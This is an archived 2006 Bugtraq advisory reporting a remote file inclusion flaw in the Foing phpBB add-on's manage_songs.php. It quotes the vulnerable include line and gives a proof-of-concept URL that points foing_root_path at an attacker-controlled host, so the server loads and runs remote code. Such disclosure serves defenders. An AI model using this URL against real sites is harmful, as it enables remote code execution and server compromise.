[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Foing (manage_songs.php) Remote File Inclusion[phpBB]

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Foing (manage_songs.php) Remote File Inclusion[phpBB]
From: darkfire@xxxxxxxxxxxxxxxx
Date: 12 Jun 2006 12:43:08 -0000

# Foing (manage_songs.php) Remote File Inclusion[phpBB]
#
# Contact : email: darkfire@xxxxxxxxxxxxxxxx & msn: darkfire@xxxxxxxxxxxxxxx
# Risk : High
# Class : Remote
# Script : Foing
# Version : 0.7.0 e previous 

---------------------------------------------------------------------

Vulnerable code :

include($foing_root_path . 'includes/common.php');

---------------------------------------------------------------------

http://www.site.com/[foing_path]/manage_songs.php?foing_root_path=http://attacker

by Darkfire and IR4DEX GROUP
Greetz: Smurf_RedHat :: V0lks

Prev by Date: PaintedOver.com, Inc. 2004-2006 Xss Vulnerabilities
Next by Date: [KAPDA::48]CopperminePhotoGallery1.4.8~ addhit() function~ SQLinjection attack
Previous by thread: Re: PaintedOver.com, Inc. 2004-2006 Xss Vulnerabilities
Next by thread: [KAPDA::48]CopperminePhotoGallery1.4.8~ addhit() function~ SQLinjection attack
Index(es):
- Date
- Thread